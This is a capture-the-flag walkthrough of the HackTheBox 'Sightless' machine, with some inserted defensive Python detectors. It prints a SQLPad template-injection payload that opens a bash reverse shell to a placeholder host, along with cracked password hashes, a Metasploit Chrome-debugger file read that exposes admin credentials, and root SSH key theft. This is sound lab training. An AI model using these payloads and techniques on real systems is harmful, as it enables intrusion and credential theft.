Sightless

Synopsis

Sightless is an easy Linux machine created by EmSec. Nmap discovers open FTP, SSH and HTTP ports. The web server serves the sightless.htb domain; the subdomain sqlpad.sightless.htb runs SQLPad, which is vulnerable to the CVE-2022-0944 RCE. The exploit gives us a foothold in a Docker container as root. The container's shadow file contains the password hashes of root and michael; cracking them gives us a shell as michael via SSH. Pillaging michael's session shows that Froxlor is listening on port 8080, that the admin.sightless.htb vhost is present in /etc/hosts, and that the user john has Chrome remote debugging enabled while running administration.py. Port forwarding and adding the vhost to /etc/hosts gives us the Froxlor login page. Metasploit's Chrome remote debugger module is used to download administration.py, which contains the credentials for the Froxlor login page. Froxlor has PHP-FPM support; enabling it and configuring a new PHP version lets us copy the root user's id_rsa.

OS      Difficulty  Points  Release Date  Retired Date
Linux   Easy        20      07-09-2024    11-01-2025


Enumeration

Nmap

Nmap finds FTP, SSH and HTTP services running.

nmap -Pn -sC -sV --min-rate=500 10.10.11.32

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 02:18 EST
Nmap scan report for 10.10.11.32
Host is up (0.88s latency).
Not shown: 964 filtered tcp ports (no-response), 33 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|_    220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=1/8%Time=677E26F3%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,44,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.10\.11\.32\]\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.49 seconds

Add sightless.htb to the /etc/hosts file.

Web - sightless.htb

The website advertises IT infrastructure services. SQLPad and Froxlor are offered for database and server management respectively.

The Start Now button in the SQLPad service section redirects to the sqlpad.sightless.htb subdomain, while the Froxlor one redirects to the Froxlor main page.

Add sqlpad.sightless.htb to the /etc/hosts file.

Web - sqlpad.sightless.htb

SQLPad is a web application designed to help users write, run and visualize SQL queries. It supports a variety of databases including Postgres, MySQL, SQL Server, and others via ODBC.


Foothold

Searching the web for SQLPad vulnerabilities leads to CVE-2022-0944, an RCE; a PoC write-up for this vulnerability is published on huntr.

Shell - Docker Container [root]

Add a new connection, choose the MySQL driver and enter the payload below in the Database field.

{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{IP}/{PORT} 0>&1\"') }}

Start a nc listener on your local machine and click Test.

nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.32 48796
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad#
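From the defender's side, the payload above is recognisable: a connection setting should never contain a template expression that reaches into the Node.js runtime. The following is an added example, not code from the writeup or from SQLPad, that scans connection records for `{{ ... }}` expressions referencing such identifiers; the token list and the sample records are assumptions constructed for the example.

```python
import re
from typing import Dict, List

# SQLPad renders {{ ... }} template expressions found in connection settings;
# CVE-2022-0944 is template injection through those fields.
TEMPLATE_RE = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)

# Identifiers a database name or host never legitimately needs: they reach the
# Node.js runtime instead of describing a database. This list is an assumption
# made for the example, not a complete rule set.
DANGEROUS_TOKENS = (
    "process", "require", "child_process", "mainModule",
    "constructor", "global", "eval", "Function",
)


def scan_connection(connection: Dict[str, object]) -> List[str]:
    """Return one finding per field whose template expression touches a
    dangerous identifier. An empty list means nothing was flagged."""
    findings = []
    for field, value in connection.items():
        if not isinstance(value, str):
            continue
        for expr in TEMPLATE_RE.findall(value):
            hits = [t for t in DANGEROUS_TOKENS if re.search(rf"\b{t}\b", expr)]
            if hits:
                findings.append(
                    f"{field}: template expression references {', '.join(hits)}"
                )
    return findings


def scan_connections(connections: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Scan a list of connection records; returns {name: findings} for the
    records that were flagged."""
    report = {}
    for conn in connections:
        findings = scan_connection(conn)
        if findings:
            report[str(conn.get("name", "?"))] = findings
    return report


# Constructed sample records in the shape of SQLPad connection settings.
SAMPLE_CONNECTIONS = [
    {"name": "reporting", "driver": "mysql", "host": "db.internal",
     "database": "sales_{{ env }}"},          # harmless template use
    {"name": "suspicious", "driver": "mysql", "host": "127.0.0.1",
     "database": "{{ process.mainModule.require('child_process').exec('id') }}"},
]

if __name__ == "__main__":
    for name, findings in scan_connections(SAMPLE_CONNECTIONS).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```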

Pivoting

Shell - Docker Container [root] -> michael

The shadow file inside the Docker container gives us michael's password hash, which can be used to pivot to the host as michael.

root@c184118df0a6:/var/lib/sqlpad# cat /etc/shadow
cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
bin:*:19051:0:99999:7:::
sys:*:19051:0:99999:7:::
sync:*:19051:0:99999:7:::
games:*:19051:0:99999:7:::
man:*:19051:0:99999:7:::
lp:*:19051:0:99999:7:::
mail:*:19051:0:99999:7:::
news:*:19051:0:99999:7:::
uucp:*:19051:0:99999:7:::
proxy:*:19051:0:99999:7:::
www-data:*:19051:0:99999:7:::
backup:*:19051:0:99999:7:::
list:*:19051:0:99999:7:::
irc:*:19051:0:99999:7:::
gnats:*:19051:0:99999:7:::
nobody:*:19051:0:99999:7:::
_apt:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
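The same listing can be audited programmatically. This is an added example, not part of the original writeup: it parses shadow entries, maps the crypt(3) prefix to the scheme and hashcat mode (the $6$ prefix is why hashcat auto-detects mode 1800 below), and separates crackable from locked or passwordless accounts; the sample lines are constructed with placeholder hash bodies.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# crypt(3) prefix -> (scheme, hashcat mode); yescrypt has no hashcat mode.
CRYPT_SCHEMES: Dict[str, Tuple[str, Optional[int]]] = {
    "$1$": ("md5crypt", 500),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$y$": ("yescrypt", None),
}

@dataclass
class ShadowEntry:
    user: str
    hash_field: str

    @property
    def locked(self) -> bool:
        # "*" never had a password; a leading "!" means the account is locked
        return self.hash_field == "*" or self.hash_field.startswith("!")

    @property
    def scheme(self) -> Optional[Tuple[str, Optional[int]]]:
        for prefix, meta in CRYPT_SCHEMES.items():
            if self.hash_field.startswith(prefix):
                return meta
        return None

def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse the colon-separated shadow format, skipping blank/comment lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            entries.append(ShadowEntry(fields[0], fields[1]))
    return entries

def audit(entries: List[ShadowEntry]) -> Dict[str, list]:
    """Summarise what someone who can read this file gains from it."""
    return {
        # real hashes: what the writeup feeds to hashcat, with the -m mode
        "crackable": [(e.user, *e.scheme) for e in entries if not e.locked and e.scheme],
        # empty second field: the account can log in with no password at all
        "passwordless": [e.user for e in entries if e.hash_field == ""],
        "locked": [e.user for e in entries if e.locked],
    }

# Constructed sample modelled on the listing above; hash bodies are placeholders.
SAMPLE_SHADOW = """\
root:$6$jn8fwk6LVJ9IYw30$CONSTRUCTEDHASH:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$CONSTRUCTEDHASH:19860:0:99999:7:::
svc:$y$j9T$CONSTRUCTEDSALT$CONSTRUCTEDHASH:19860:0:99999:7:::
guest::19860:0:99999:7:::
"""
```

The hardening lesson is the audit result itself: a container image that ships real password hashes, including one belonging to a host user, turns container-level RCE into host access.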

Create a file, paste both hashes into it and crack them with hashcat.

hashcat -a 0 hash /usr/share/wordlists/rockyou.txt

hash in the command above is the name of the file containing the hashes.

hashcat --show hash
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

1800 | sha512crypt $6$, SHA512 (Unix) | Operating System

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:blindside
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownposse

ssh michael@10.10.11.32
michael@10.10.11.32's password: 
Last login: Tue Sep  3 11:52:02 2024 from 10.10.14.23
michael@sightless:~$ 

The user.txt file contains the user flag, which we can now read 👏


Privilege Escalation

Pillaging - michael [user]

Michael does not have the privilege to run sudo. netstat lists the listening ports.

michael@sightless:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:42735         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:46215         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:45813         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      - 

Port 8080 hosts the Froxlor service. Forward it to the local machine for further enumeration.

curl http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
	<!-- Required meta tags -->
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<meta name="robots" content="noindex, nofollow, noarchive"/>
	<meta name="googlebot" content="nosnippet"/>
	<link rel="icon" type="image/x-icon" href="templates/Froxlor/assets/img/icon.png">
	<meta name="csrf-token" content="a447207d749fd9ae386af245d62cd982c4660eda" />
	<!-- Assets  -->
	<link rel="stylesheet" href="templates/Froxlor/build/assets/app-61450a15.css">
<script src="templates/Froxlor/build/assets/app-67d6acee.js" type="module"></script>

	<title>Froxlor</title>
</head>
<body id="app" class="min-vh-100 d-flex flex-column">
	
			<div class="container-fluid">
				<div class="container">
		<div class="row justify-content-center">
			<form class="col-12 max-w-420 d-flex flex-column" method="post" enctype="application/x-www-form-urlencoded">
				<img class="align-self-center my-5" src="templates/Froxlor/assets/img/logo.png" alt="Froxlor Server Management Panel"/>

				<div class="card shadow">
					<div class="card-body">
						<h5 class="card-title">Login</h5>
						<p>Please log in to access your account.</p>

						
						<div class="mb-3">
							<label for="loginname" class="col-form-label">Username</label>
							<input class="form-control" type="text" name="loginname" id="loginname" value="" required autofocus/>
						</div>

						<div class="mb-3">
							<label for="password" class="col-form-label">Password</label>
							<input class="form-control" type="password" name="password" id="password" value="" required/>
						</div>
					</div>

					<div class="card-body d-grid gap-2">
						<button class="btn btn-primary" type="submit" name="dologin">Login</button>
					</div>

											<div class="card-footer">
							<a class="card-link text-body-secondary" href="index.php?action=forgotpwd">Forgot your password?</a>
						</div>
									</div>
			</form>
		</div>
	</div>
			<footer class="text-center mb-3">
	<span>
		<img src="templates/Froxlor/assets/img/logo_grey.png" alt="Froxlor"/>
									&copy; 2009-2025 by <a href="https://www.froxlor.org/" rel="external" target="_blank">the froxlor team</a><br>
														</span>

    </footer>

		</div>
	</body>
</html>

ssh -L 8080:localhost:8080 michael@10.10.11.32

The target's /etc/hosts file has an admin.sightless.htb vhost entry for the Froxlor site. Add admin.sightless.htb to your own /etc/hosts file as well.

127.0.0.1        localhost admin.sightless.htb

ps aux reveals that the user john is running a headless Chrome with remote debugging enabled, which can be used to find the credentials for the login above.

ps aux | grep chrome
john        3704  0.3  0.3 33630172 15432 ?      Sl   15:19   0:01 /home/john/automation/chromedriver --port=57135
john        3709  0.0  0.0      0     0 ?        Z    15:19   0:00 [chromedriver] <defunct>
john        3711  0.5  2.9 34019516 115608 ?     Sl   15:19   0:02 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.WWQhV3 data:,
john        3717  0.0  0.0 33575860 1652 ?       Sl   15:19   0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
john        3721  0.0  1.4 34112456 56964 ?      S    15:19   0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=3717 --enable-crash-reporter
john        3722  0.0  1.4 34112452 57500 ?      S    15:19   0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=3717 --enable-crash-reporter
john        3739  0.3  3.0 34362352 122200 ?     Sl   15:19   0:01 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=3717 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --field-trial-handle=3,i,1381930
john        3740  0.1  2.1 33900068 87300 ?      Sl   15:19   0:00 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=3717 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,13819301115298270099,15471180059159053128,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
john        3769  2.4  5.5 1186791276 218300 ?   Sl   15:19   0:09 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=3717 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1736345423887471 --launch-time-ticks=4118668471 --s
michael     4105  0.0  0.0   6612  2236 pts/3    S+   15:25   0:00 grep --color=auto chrome

The user john is also running the following command:

/usr/bin/python3 /home/john/automation/administration.py
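A browser started with remote debugging enabled exposes the DevTools protocol, including file:// navigation, to anyone who can reach its socket, so it is worth flagging in host audits. The following is an added example, not part of the writeup or of any tool it uses, that parses `ps aux` output and reports browser processes carrying `--remote-debugging-port`, noting that port 0 means an ephemeral port; the sample output is constructed and abbreviated from the listing above.

```python
import re
import shlex
from typing import Dict, List, Optional, Tuple

# The flag that turns on the DevTools protocol over TCP. Port 0 tells Chrome
# to pick an ephemeral port, which is why the listener ends up on a random
# high port rather than the usual 9222.
DEBUG_PORT_FLAG = re.compile(r"^--remote-debugging-port=(\d+)$")
BROWSER_NAMES = ("chrome", "chromium")

def parse_ps_line(line: str) -> Optional[Tuple[str, int, List[str]]]:
    """Split one `ps aux` row into (user, pid, argv); None for the header or
    anything that does not look like a process row."""
    parts = line.split(None, 10)
    if len(parts) < 11 or not parts[1].isdigit():
        return None
    try:
        argv = shlex.split(parts[10])
    except ValueError:                 # unbalanced quotes in the command line
        argv = parts[10].split()
    return parts[0], int(parts[1]), argv

def find_debuggable_browsers(ps_output: str) -> List[Dict[str, object]]:
    """Report browser processes started with remote debugging enabled."""
    findings = []
    for line in ps_output.splitlines():
        row = parse_ps_line(line)
        if row is None:
            continue
        user, pid, argv = row
        exe = argv[0].rsplit("/", 1)[-1] if argv else ""
        if exe not in BROWSER_NAMES:
            continue
        # Helper processes (--type=renderer, zygote, gpu-process, ...) inherit
        # the flag, but only the browser process binds the debugging socket.
        if any(a.startswith("--type=") for a in argv):
            continue
        for arg in argv[1:]:
            m = DEBUG_PORT_FLAG.match(arg)
            if m:
                findings.append({
                    "user": user,
                    "pid": pid,
                    "port": "ephemeral" if m.group(1) == "0" else int(m.group(1)),
                    "sandbox_disabled": "--no-sandbox" in argv,
                })
    return findings

# Constructed, abbreviated `ps aux` output modelled on the listing above.
SAMPLE_PS = """\
USER         PID %CPU %MEM      VSZ    RSS TTY      STAT START   TIME COMMAND
john        3704  0.3  0.3 33630172  15432 ?        Sl   15:19   0:01 /home/john/automation/chromedriver --port=57135
john        3711  0.5  2.9 34019516 115608 ?        Sl   15:19   0:02 /opt/google/chrome/chrome --enable-automation --headless --no-sandbox --remote-debugging-port=0 --user-data-dir=/tmp/.org.chromium.Chromium.WWQhV3 data:,
john        3721  0.0  1.4 34112456  56964 ?        S    15:19   0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --headless
john        3769  2.4  5.5 1186791276 218300 ?      Sl   15:19   0:09 /opt/google/chrome/chrome --type=renderer --headless --no-sandbox --remote-debugging-port=0
michael     4105  0.0  0.0     6612   2236 pts/3    S+   15:25   0:00 grep --color=auto chrome
"""
```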

Exploit - Chrome Remote Debugger [Metasploit]

Metasploit has a module for the Chrome remote debugger. I will use it to download the administration.py file and recover the Froxlor dashboard credentials.

  • Port forward all the high-numbered localhost ports from the netstat output.

  • Run the Metasploit module against each forwarded port until the administration.py file is downloaded.

sudo msfdb run

[msf](Jobs:0 Agents:0) >> search debugger

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  auxiliary/gather/chrome_debugger       2019-09-24       normal     No     Chrome Debugger Arbitrary File Read / Arbitrary Web Request
   1  exploit/multi/misc/java_jdwp_debugger  2010-03-12       good       Yes    Java Debug Wire Protocol Remote Code Execution
   2    \_ target: Linux (Native Payload)    .                .          .      .
   3    \_ target: OSX (Native Payload)      .                .          .      .
   4    \_ target: Windows (Native Payload)  .                .          .      .
   5  exploit/linux/ssh/mercurial_ssh_exec   2017-04-18       excellent  No     Mercurial Custom hg-ssh Wrapper Remote Code Exec
   6  exploit/multi/misc/nodejs_v8_debugger  2016-08-15       excellent  Yes    NodeJS Debugger Command Injection
   7  exploit/multi/http/werkzeug_debug_rce  2015-06-28       excellent  Yes    Werkzeug Debug Shell Command Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/multi/http/werkzeug_debug_rce

[msf](Jobs:0 Agents:0) >> use 0
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> info
       Name: Chrome Debugger Arbitrary File Read / Arbitrary Web Request
     Module: auxiliary/gather/chrome_debugger
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-09-24

Provided by:
  Adam Baldwin (Evilpacket)
  Nicholas Starke (The King Pig Demon)

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILEPATH                   no        File to fetch from remote machine.
  RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT     9222             yes       The target port (TCP)
  TIMEOUT   10               yes       Time to wait for response
  URL                        no        Url to fetch from remote machine.

Description:
  This module uses the Chrome Debugger's API to read
  files off the remote file system, or to make web requests
  from a remote machine.  Useful for cloud metadata endpoints!


View the full module info with the info -d command.

[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> set RHOSTS localhost
RHOSTS => localhost
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> set RPORT 41429
RPORT => 41429
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> exploit -j
[*] Running module against 127.0.0.1

[*] Attempting Connection to ws://127.0.0.1:41429/devtools/page/B76FEFCB8EAE8305BE4A0ABD159F297D
[*] Opened connection
[*] Attempting to load url file:///home/john/automation/administration.py
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Stored file:///home/john/automation/administration.py at /root/.msf4/loot/20250108101826_default_127.0.0.1_chrome.debugger._522145.txt
[*] Running module against ::1
[-] Bad Response
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> 

The port numbers may differ on your instance: Chrome was started with --remote-debugging-port=0 (visible in the ps output), so it binds an ephemeral port. In my case the remote debugger listened on port 41429.

sudo cat /root/.msf4/loot/20250108101826_default_127.0.0.1_chrome.debugger._522145.txt
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
import time
import threading
import schedule

options = Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')

# Update this line with the path to your locally downloaded Chrome driver
chrome_driver_path = '/home/john/automation/chromedriver'

# Use Service to specify the Chrome driver binary path
service = Service(chrome_driver_path)
service.start()

driver = webdriver.Chrome(service=service, options=options)

def dismiss_all_alerts(driver):
    while True:
        try:
            alert = driver.switch_to.alert
            print(f"Dismissed alert with text: {alert.text}")
            alert.accept()
            time.sleep(1)
        except NoAlertPresentException:
            break

print("browser opened")
while True:
    try:
        driver.get("http://admin.sightless.htb:8080/admin_logger.php?page=log")
        time.sleep(7)

        # Username Field
        input_element = driver.find_element(By.ID, "loginname")
        input_element.send_keys("admin")

        # Password field
        input_element = driver.find_element(By.ID, "password")
        input_element.send_keys("ForlorfroxAdmin" + Keys.ENTER)
        print("Logged In...")
    except UnexpectedAlertPresentException:
        input_element.send_keys(Keys.ENTER)
        pass
    time.sleep(5)
    dismiss_all_alerts(driver)
    driver.get("http://admin.sightless.htb:8080/admin_index.php?action=logout")
    driver.get("http://admin.sightless.htb:8080/")
    print("Logged Out")
    time.sleep(3)
    #driver.close()
</pre></body></html>

The credentials for the Froxlor dashboard are admin:ForlorfroxAdmin.

Shell - root

Froxlor's PHP-FPM support can be used to get a shell as root or to read the root.txt file.

  • Enable PHP-FPM: System > Settings > PHP-FPM.

  • Copy the root user's id_rsa (or root.txt) to /tmp by configuring a new PHP version, as outlined in the synopsis.

  • Change directory to /tmp and cat id_rsa.

michael@sightless:~$ cd /tmp
michael@sightless:/tmp$ cat id_rsa

  • Copy id_rsa to your local machine, fix its permissions and ssh in as root.

chmod 600 id_rsa

ssh -i id_rsa root@10.10.11.32
Last login: Tue Sep  3 08:18:45 2024
root@sightless:~#

The root.txt file contains the root flag 🎉
